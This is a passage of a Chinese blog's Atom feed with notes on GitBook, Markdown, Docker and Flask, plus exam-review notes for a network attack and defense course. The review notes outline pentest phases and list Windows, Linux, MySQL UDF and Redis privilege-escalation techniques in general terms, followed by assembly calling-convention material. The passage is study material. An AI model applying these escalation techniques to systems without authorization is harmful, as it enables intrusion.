src="https://s1.ax1x.com/2020/08/01/a37BHe.png" alt="a37BHe.png"></p><p>+++</p><p>此时会在MyGitBook目录下生成<code>_book</code>目录,其中是index.html和一些配置文件;</p><p><code>gitbook serve</code>本身包括了<code>gitbook build</code>命令,执行 <code>gitbook build</code> 命令构建书籍,默认将生成的静态网站输出到 _book 目录;</p><p>+++</p><p>参考:</p><p><a href="https://blog.csdn.net/weixin_34293141/article/details/91413019" target="_blank" rel="noopener">1</a></p><p><a href="https://blog.csdn.net/lu_embedded/article/details/81100704?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-3.channel_param&depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-3.channel_param" target="_blank" rel="noopener">2</a></p>]]></content>
<summary type="html">
<h1 id="安装"><a href="#安装" class="headerlink" title="安装"></a>安装</h1><ol>
<li><p>推荐搭配:Git + Gitbook + Typora</p>
</li>
<li><p>环境:</p>
<ul>
<li
</summary>
<category term="notes" scheme="https://singlemindedt.github.io/tags/notes/"/>
</entry>
<entry>
<title>Markdown语法记录</title>
<link href="https://singlemindedt.github.io/2020/07/31/Markdown%E8%AF%AD%E6%B3%95%E8%AE%B0%E5%BD%95/"/>
<id>https://singlemindedt.github.io/2020/07/31/Markdown语法记录/</id>
<published>2020-07-31T15:51:42.000Z</published>
<updated>2020-11-10T06:38:55.481Z</updated>
<content type="html"><![CDATA[<ol><li><p>颜色、字体、大小<br> <font color="#ff000" face="黑体" size="4">测试0</font></p><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag"><<span class="name">font</span> <span class="attr">color</span>=<span class="string">#ff000</span> <span class="attr">face</span>=<span class="string">"黑体"</span> <span class="attr">size</span>=<span class="string">4</span>></span>测试0<span class="tag"></<span class="name">font</span>></span></span><br></pre></td></tr></table></figure></li></ol><p> <font color="#000000" face="华文彩云" size="4">测试1</font></p> <figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag"><<span class="name">font</span> <span class="attr">color</span> =<span class="string">#000000</span> <span class="attr">face</span> =<span class="string">"华文彩云"</span> <span class="attr">size</span>=<span class="string">4</span>></span>测试1<span class="tag"></<span class="name">font</span>></span></span><br></pre></td></tr></table></figure><ol start="2"><li>注释</li></ol><ul><li><strong>代码法</strong></li></ul><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag"><<span class="name">div</span> <span class="attr">style</span>=<span class="string">'display: none'</span>></span></span><br><span class="line">注释0</span><br><span class="line"><span class="tag"></<span class="name">div</span>></span></span><br></pre></td></tr></table></figure><ul><li><strong>html注释</strong></li></ul><p>既然支持html语法,那也支持html注释,快捷键 comment + /。</p><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"><!--注释1--></span></span><br><span class="line"></span><br><span class="line"><span class="comment"><!--</span></span><br><span class="line"><span class="comment">多段注释,</span></span><br><span class="line"><span class="comment">2</span></span><br><span class="line"><span class="comment"> --></span></span><br></pre></td></tr></table></figure><ul><li><strong>hack方法</strong></li></ul><p>hack方法就是利用markdown的解析原理来实现注释的。<br> 一般有的markdown解析器不支持上面的注释方法,这个时候就可以用hack方法。<br> hack方法比上面2种方法稳定得多,但是语义化太差。</p><figure class="highlight csharp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">[<span class="meta">//</span>]: <span class="meta"># (哈哈我是最强注释,不会在浏览器中显示。)</span></span><br><span class="line">[<span class="meta">^_^</span>]: <span class="meta"># (哈哈我是最萌注释,不会在浏览器中显示。)</span></span><br><span class="line">[<span class="meta">//</span>]: <> (哈哈我是注释,不会在浏览器中显示。)</span><br><span class="line">[<span class="meta">comment</span>]: <> (哈哈我是注释,不会在浏览器中显示。)</span><br></pre></td></tr></table></figure><p><a href="https://www.jianshu.com/p/ebe52d2d468f" target="_blank" rel="noopener">此处参考:择势勤</a></p><hr><p>表情参考:</p><p><a href="https://www.webfx.com/tools/emoji-cheat-sheet/" target="_blank" rel="noopener">https://www.webfx.com/tools/emoji-cheat-sheet/</a></p><p>:blue_heart: :heart::purple_heart:</p><p>:relaxed:</p><p><a href="https://markdown.com.cn/" target="_blank" rel="noopener">Markdown语法教程</a></p>]]></content>
<summary type="html">
<ol>
<li><p>颜色、字体、大小<br> <font color="#ff000" face="黑体" size="4">测试0</font></p>
<figure class="highlight html"><table><tr><td class="gutter"
</summary>
<category term="notes" scheme="https://singlemindedt.github.io/tags/notes/"/>
</entry>
<entry>
<title>Docker-notes1</title>
<link href="https://singlemindedt.github.io/2020/07/31/Docker-notes1/"/>
<id>https://singlemindedt.github.io/2020/07/31/Docker-notes1/</id>
<published>2020-07-31T05:14:01.000Z</published>
<updated>2020-07-31T15:56:47.392Z</updated>
<content type="html"><![CDATA[<blockquote><p>喜欢钻研和分享;</p></blockquote><blockquote><p>只要学不死就往死里学;</p></blockquote><h1 id="概念"><a href="#概念" class="headerlink" title="概念"></a>概念</h1><blockquote><p>Problems:</p><ul><li>我在我的电脑上可以运行???</li><li>配置应用环境麻烦,且不可跨平台</li></ul></blockquote><p><strong>打包项目带上环境(镜像)–>(Docker仓库=商店)–>下载我们发布的镜像,可直接运行!</strong></p><p>思想来源:集装箱<br>jre:多个应用(端口冲突),交叉;<br>核心:隔离,每个集装箱都是互相隔离的;通过隔离机制可将服务器利用到极致!</p>]]></content>
<summary type="html">
<blockquote>
<p>喜欢钻研和分享;</p>
</blockquote>
<blockquote>
<p>只要学不死就往死里学;</p>
</blockquote>
<h1 id="概念"><a href="#概念" class="headerlink" title=
</summary>
<category term="notes" scheme="https://singlemindedt.github.io/tags/notes/"/>
</entry>
<entry>
<title>pycharm开发flask指定ip、端口无效</title>
<link href="https://singlemindedt.github.io/2020/06/21/pycharm%E5%BC%80%E5%8F%91flask%E6%8C%87%E5%AE%9Aip%E3%80%81%E7%AB%AF%E5%8F%A3%E6%97%A0%E6%95%88/"/>
<id>https://singlemindedt.github.io/2020/06/21/pycharm开发flask指定ip、端口无效/</id>
<published>2020-06-20T16:16:09.000Z</published>
<updated>2020-06-20T16:17:18.697Z</updated>
<content type="html"><![CDATA[<p><a href="https://blog.csdn.net/JENREY/article/details/86699817?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-1.nonecase&depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-1.nonecase" target="_blank" rel="noopener">pycharm开发flask指定ip、端口无效</a></p><p><a href="https://www.cnblogs.com/xiaodai0/p/10460751.html" target="_blank" rel="noopener">python—–flask项目端口设置无效</a></p>]]></content>
<summary type="html">
<p><a href="https://blog.csdn.net/JENREY/article/details/86699817?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLea
</summary>
<category term="flask" scheme="https://singlemindedt.github.io/tags/flask/"/>
</entry>
<entry>
<title>网络攻击与防御复习</title>
<link href="https://singlemindedt.github.io/2020/06/12/%E7%BD%91%E7%BB%9C%E6%94%BB%E5%87%BB%E4%B8%8E%E9%98%B2%E5%BE%A1%E5%A4%8D%E4%B9%A0%E7%9F%A5%E8%AF%86%E7%82%B9%E6%80%BB%E7%BB%93/"/>
<id>https://singlemindedt.github.io/2020/06/12/网络攻击与防御复习知识点总结/</id>
<published>2020-06-12T05:20:08.000Z</published>
<updated>2020-06-12T09:07:20.241Z</updated>
<content type="html"><![CDATA[<p>[TOC]</p><p>+++</p><p>1、Web安全</p><p>2、逆向安全</p><p>3、移动通信安全</p><h4 id="题型:"><a href="#题型:" class="headerlink" title="题型:"></a><strong>题型:</strong></h4><p><strong>论述题:3*10</strong></p><p>(简答题,记忆)</p><p><strong>材料分析题:20</strong></p><p>(代码相关web or 代码无关)</p><p><strong>代码分析题:20+30</strong></p><p>(20Web/30RE)</p><p>+++</p><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C6.png" alt="6"></p><p>+++</p><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C7.png" alt="6"></p><p>+++</p><p>Web方面代码主要考:<strong>PHP代码</strong></p><p>+++</p><h3 id="1、代码审计与渗透测试的区别和优缺点"><a href="#1、代码审计与渗透测试的区别和优缺点" class="headerlink" title="1、代码审计与渗透测试的区别和优缺点"></a>1、代码审计与渗透测试的区别和优缺点</h3><p><font color="#ff000" face="黑体" size="4">☆☆☆</font></p><table><thead><tr><th></th><th>渗透测试(威胁:来自外部入侵)</th><th>代码审计(脆弱性:系统自身、软件等问题)</th></tr></thead><tbody><tr><td>描述</td><td>模拟黑客攻击,评估目标系统安全性</td><td>查找程序中存在的不安全编码</td></tr><tr><td>测试目标</td><td>包括但不限于Web应用</td><td>基于提供的系统代码,寻找代码漏洞</td></tr><tr><td>测试产出</td><td>渗透测试报告+修复建议</td><td>代码审计报告+修复建议</td></tr><tr><td>优点</td><td>贴近实际场景,远程渗透</td><td>全面审查,贴近系统和架构,修复成本低</td></tr><tr><td>缺点</td><td>测试不全面,修复成本高</td><td>现场审计</td></tr></tbody></table><p>+++</p><h3 id="2、代码审计流程"><a href="#2、代码审计流程" class="headerlink" title="2、代码审计流程"></a>2、代码审计流程</h3><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C3.png" alt="3"></p><p>拿到源代码后,先使用工具进行整体扫面,然后对扫描结构进行人工漏洞确认,同时,进行人工安全编码审计,进而解决一些常规漏洞和逻辑漏洞。最后综合审计结构,编写并提交代码审计报告。</p><p>+++</p><h3 id="3、代码审计的通用方法"><a href="#3、代码审计的通用方法" class="headerlink" title="3、代码审计的通用方法"></a>3、代码审计的通用方法</h3><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C4.png" alt="3"></p><p>+++</p><h3 id="4、PHP代码审计:代码分析"><a href="#4、PHP代码审计:代码分析" class="headerlink" title="4、PHP代码审计:代码分析"></a>4、PHP代码审计:代码分析</h3><p><strong>(XSS、文件上传、文件包含、代码执行、CSRF等)</strong></p><p><font color="#ff000" face="黑体" size="4">反序列化漏洞☆☆☆</font></p><p>+++</p><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C8.png" alt="6"></p><p>+++</p><p>查看渗透测试案例;</p><p>+++</p><h3 id="1、渗透测试的流程和每一步要做的工作"><a href="#1、渗透测试的流程和每一步要做的工作" class="headerlink" title="1、渗透测试的流程和每一步要做的工作"></a>1、渗透测试的流程和每一步要做的工作</h3><p>渗透测试分为<strong>七个阶段</strong>:</p><p>1、 前期交互阶段</p><p>2、 情报搜集阶段</p><p>3、 威胁建模阶段</p><p>4、 漏洞分析阶段</p><p>5、 渗透攻击阶段</p><p>6、 后渗透攻击阶段</p><p>7、 报告阶段</p><h4 id="1、前期交互阶段"><a href="#1、前期交互阶段" class="headerlink" title="1、前期交互阶段"></a>1、前期交互阶段</h4><ul><li>确定渗透测试的<strong>范围</strong>(允许测试)和<strong>目标</strong>(预期效果)</li><li>测试的类型(黑盒/白盒)</li><li>时间段、费用等</li></ul><blockquote><p>目标:</p><ul><li>列出所有漏洞</li><li>证明各种漏洞存在</li><li>测试各种事件响应</li><li>对网络、系统或应用程序漏洞的渗透模块开发</li></ul></blockquote><h4 id="2、情报搜集阶段(最重要阶段之一,40-60-)"><a href="#2、情报搜集阶段(最重要阶段之一,40-60-)" class="headerlink" title="2、情报搜集阶段(最重要阶段之一,40-60%)"></a>2、情报搜集阶段(最重要阶段之一,40-60%)</h4><ul><li>采用各种方式尽可能<strong>收集目标网络的信息</strong></li><li>大致步骤:</li></ul><p>1、 <strong>目标选择</strong>:选择攻击目标,确定攻击效果</p><p>2、 <strong>隐私收集</strong>:现场手机+外部收集</p><p>3、 <strong>踩点工作</strong>:主动和被动扫描技术</p><p>4、 <strong>验证目标的安全机制</strong>:防火墙、网络流量过滤系统、网络和主机的保护措施</p><h4 id="3、威胁建模阶段"><a href="#3、威胁建模阶段" class="headerlink" title="3、威胁建模阶段"></a>3、威胁建模阶段</h4><ul><li>模拟出对目标的威胁以及威胁的作用,根据威胁可能对目标系统产生的影响进行分类</li><li>结合信息收集阶段作出的分析,确定最佳的攻击方式</li><li>需要解决的问题:</li></ul><blockquote><p>如何攻击指定的网络?<br> 需要获取的重要信息是什么?<br> 采取什么攻击方式最合适?<br> 对目标最大的安全威胁是什么?</p></blockquote><p>(漏洞扫描工具( Nexpose或 Metasploit Pro)可以帮助自动化的快速的完成威胁建模)</p><h4 id="4、漏洞分析阶段"><a href="#4、漏洞分析阶段" class="headerlink" title="4、漏洞分析阶段"></a>4、漏洞分析阶段</h4><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C5.png" alt="3"></p><h4 id="5、渗透攻击阶段"><a href="#5、渗透攻击阶段" class="headerlink" title="5、渗透攻击阶段"></a>5、渗透攻击阶段</h4><ul><li>渗透攻击阶段可以<strong>利用以前漏洞分析阶段的成果</strong>,是<strong>真正的攻击阶段</strong></li></ul><h4 id="6、后渗透攻击阶段"><a href="#6、后渗透攻击阶段" class="headerlink" title="6、后渗透攻击阶段"></a>6、后渗透攻击阶段</h4><ul><li>后渗透攻击阶段包括了<strong>当成功渗透攻击到对方计算机以后</strong>的很多任务,比如提权、上传和下载文件、跳板攻击等</li></ul><p>(以特定的业务系统为目标,识别岀关键基础设施,并寻找客户最有价值的资产)</p><h4 id="7、报告阶段"><a href="#7、报告阶段" class="headerlink" title="7、报告阶段"></a>7、报告阶段</h4><p>报告的主要组成部分:</p><ul><li><strong>确定</strong>目标最为<strong>重要的威胁</strong></li><li>将渗透测试得到的数据<strong>生成表格和图表</strong></li><li>对<strong>目标系统</strong>的<strong>改进建议</strong></li><li>对问题的<strong>修复方案</strong></li></ul><p>+++</p><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C9.png" alt="6"></p><p>+++</p><p>需要用自己的语言描述;</p><p>+++</p><h3 id="1、为什么要提权?"><a href="#1、为什么要提权?" class="headerlink" title="1、为什么要提权?"></a>1、为什么要提权?</h3><p><strong>提权</strong>:利用操作系统或应用软件中的<strong>程序错误</strong>、<strong>设计缺陷</strong>或<strong>配置不当</strong>来获取受保护资源的<strong>高级访问权限</strong></p><ul><li>后渗透测试阶段,获得了目标系统<strong>低权限的Shell</strong>,对目标的<strong>某些访问依旧受限</strong></li><li>需要进行提权操作,来<strong>获得目标系统的最高权限</strong></li></ul><p>+++</p><h3 id="2、提权的方法和步骤-不同操作系统下的提权技术"><a href="#2、提权的方法和步骤-不同操作系统下的提权技术" class="headerlink" title="2、提权的方法和步骤/不同操作系统下的提权技术"></a>2、提权的方法和步骤/不同操作系统下的提权技术</h3><h4 id="1、Windows系统提权的一般步骤"><a href="#1、Windows系统提权的一般步骤" class="headerlink" title="1、Windows系统提权的一般步骤"></a>1、Windows系统提权的一般步骤</h4><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C6.png" alt="3"></p><ul><li>利用内核漏洞提权(MS13_053 etc.)</li><li>利用操作系统漏洞提权:</li></ul><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C7.png" alt="3"></p><ul><li>利用应用程序漏洞提权</li></ul><h4 id="2、Linux系统提权"><a href="#2、Linux系统提权" class="headerlink" title="2、Linux系统提权"></a>2、Linux系统提权</h4><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C8.png" alt="3"></p><ul><li>SUID程序提权</li><li>修改用户属组(文件权限配置不当)</li><li>修改/etc/ passwd</li><li>修改root用户ssh密钥</li><li>通配符提权</li><li>应用程序提权</li></ul><h4 id="3、数据库UDF提权"><a href="#3、数据库UDF提权" class="headerlink" title="3、数据库UDF提权"></a>3、数据库UDF提权</h4><p>UDF:User Defined Function</p><p>前提条件:</p><ol><li>获得root账户密码</li><li>数据库开启 plugin</li><li>数据库监听公网</li></ol><h4 id="4、Redis提权(未授权访问等漏洞)"><a href="#4、Redis提权(未授权访问等漏洞)" class="headerlink" title="4、Redis提权(未授权访问等漏洞)"></a>4、Redis提权(未授权访问等漏洞)</h4><p>Redis数据库以root权限启动,配合未授权访问漏洞,攻击者可以连接数据库并写入ssh密钥,接着就可以以root用户身份登录服务器</p><p>+++</p><h3 id="3、提权的防御"><a href="#3、提权的防御" class="headerlink" title="3、提权的防御"></a>3、提权的防御</h3><ul><li>及时打补丁</li><li>启动Web、DB服务时以低权限启动(最小权限原则)</li><li>服务只监听127.0.0.1(不要开在公网)</li></ul><p>+++</p><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C10.png" alt="6"></p><p>+++</p><p>最后一题30分(RE,分析汇编语言代码;给出高级语言用汇编分析/给出任务要求写出汇编;课上用到的—关于堆栈方面的汇编代码)</p><p>给出汇编,说明该段代码的具体意义,如何工作;</p><p><strong>调用约定</strong>,四种常见的,<strong>堆栈的变化</strong>:根据代码画出堆栈变化情况;</p><p>(堆,不考)</p><p>+++</p><h3 id="1、字节序"><a href="#1、字节序" class="headerlink" title="1、字节序"></a>1、字节序</h3><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C9.png" alt="3"></p><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C29.png" alt="3"></p><p><a href="https://www.k2zone.cn/?p=1911" target="_blank" rel="noopener">函数栈&EIP、EBP、ESP</a></p><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C31.png" alt="3"></p><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C30.png" alt="3"></p><ul><li><p>将ebx、exi、edi压入栈的原因:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">push ebp</span><br><span class="line">push esi</span><br><span class="line">push edi</span><br></pre></td></tr></table></figure><p>保存寄存器原有的值(保存在了栈上)(栈帧切换时不能破坏上一个函数中某些寄存器的值,寄存器只有一份,现在寄存器归我用,可能改变寄存器的值,导致函数返回时回不去,所以要保存原有的值。)</p></li><li><p>rep stosd 循环指令,循环ecx次(14次)往eax里填充CCCCCCCC(填C的原因:把之前的垃圾数据清空,INT3中断)</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">lea edi,dword ptr ss:[ebp-50]//lea取偏移地址</span><br><span class="line">mov ecx,14</span><br><span class="line">mov eax,CCCCCCCC</span><br><span class="line">rep stosd</span><br></pre></td></tr></table></figure><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C32.png" alt="3"></p></li><li><p>ds段(数据段);</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">mov al,byte ptr ds:[424A30]</span><br><span class="line">mov byte ptr ss:[ebp-4],al</span><br><span class="line">...</span><br><span class="line">...</span><br><span class="line">..</span><br><span class="line">..</span><br></pre></td></tr></table></figure></li></ul><p> 由于无法在内存中传递数据,所以先把内存数据传入CPU,再从CPU传到内存的栈上去</p><ul><li>对字符串操作,传的是字符串的地址</li></ul><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mov dword ptr ss:[ebp-10],zijixu.424A38:"abcde"</span><br></pre></td></tr></table></figure><ul><li>异或操作</li></ul><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">xor eax,eax</span><br></pre></td></tr></table></figure><p>清零操作,代表<code>return 0</code>;默认函数返回值都是放在eax里,通过异或操作将返回值置零;</p><blockquote><p>为什么不用<code>mov eax,0x0</code>清零?</p><p>效率低,占内存</p></blockquote><ul><li>还原栈</li></ul><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">mov esp,ebp//将</span><br><span class="line">pop ebp</span><br></pre></td></tr></table></figure><ul><li>将栈顶的地址弹到EIP中</li></ul><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ret</span><br></pre></td></tr></table></figure><p>+++</p><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C34.png" alt="3"></p><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C35.png" alt="3"></p><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C36.png" alt="3"></p><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C33.png" alt="3"></p><p>压栈ecx,此时栈顶esp就是ecx里的值,故之后打印的结果应该都是ecx的值;</p><p>+++</p><h3 id="2、汇编基础(给定代码能说明其含义)"><a href="#2、汇编基础(给定代码能说明其含义)" class="headerlink" title="2、汇编基础(给定代码能说明其含义)"></a>2、汇编基础(给定代码能说明其含义)</h3><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C37.png" alt="3"></p><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C38.png" alt="3"></p><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C39.png" alt="3"></p><p>+++</p><h3 id="3、调用约定(相关的汇编代码分析和栈的变化情况)"><a href="#3、调用约定(相关的汇编代码分析和栈的变化情况)" class="headerlink" title="3、调用约定(相关的汇编代码分析和栈的变化情况)"></a>3、调用约定(相关的汇编代码分析和栈的变化情况)</h3><p><font color="#ff000" face="黑体" size="4">☆☆☆</font></p><p><strong>栈帧</strong>:程序运行时栈中分配的内存块,专门用于特定的函数调用</p><p>栈帧的大致结构:</p><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C40.png" alt="3"></p><p>调用一个函数时的操作步骤:</p><ol><li>调用方将被调用函数所需参数放入到函数所采用的调用约定指定的位置</li><li>调用方将控制权转交给被调用函数(call),然后返回地址被保存到程序栈或CPU寄存器中</li><li>被调用函数为局部变量分配空间</li><li>被调用函数执行操作</li><li>被调用函数完成操作,释放局部变量的栈空间</li><li>被调用函数将控制权返还给调用方(ret)</li></ol><p>+++</p><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C42.png" alt="3"></p><p>+++</p><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C41.png" alt="3"></p><p>+++</p><h4 id="cdecl☆☆☆"><a href="#cdecl☆☆☆" class="headerlink" title="cdecl☆☆☆"></a>cdecl<font color="#ff000" face="黑体" size="4">☆☆☆</font></h4><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C43.png" alt="3"></p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">add esp,10h //相当于调用方清栈(调用方调整栈帧))(esp+10h,由于栈在内存中表现为从高地址往低地址增长,esp栈顶+16相当于压缩栈)</span><br><span class="line"></span><br><span class="line">1、先进后出。</span><br><span class="line">2、在内存中表现为从高地址往低地址增长。(从高地址压栈->低地址)</span><br><span class="line">3、栈顶esp:栈的最上方(低地址区)。</span><br><span class="line">4、栈低ebp:栈的最下方(高地址区)。</span><br></pre></td></tr></table></figure><p>+++</p><h4 id="stdcall"><a href="#stdcall" class="headerlink" title="stdcall"></a>stdcall</h4><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C44.png" alt="3"></p><p>打开被调用方:</p><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C45.png" alt="3"></p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">retn 10h //被调用方清栈(被调用方调整栈帧);ret先返回到EIP,随后,相当于add esp,10h</span><br><span class="line">参数固定</span><br></pre></td></tr></table></figure><p>+++</p><h4 id="fastcall"><a href="#fastcall" class="headerlink" title="fastcall"></a>fastcall</h4><p>调用方:</p><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C46.png" alt="3"></p><p>被diao</p><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C47.png" alt="3"></p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">mov [ebp+var_C],edx</span><br><span class="line">mov [ebp+var_8],ecx</span><br><span 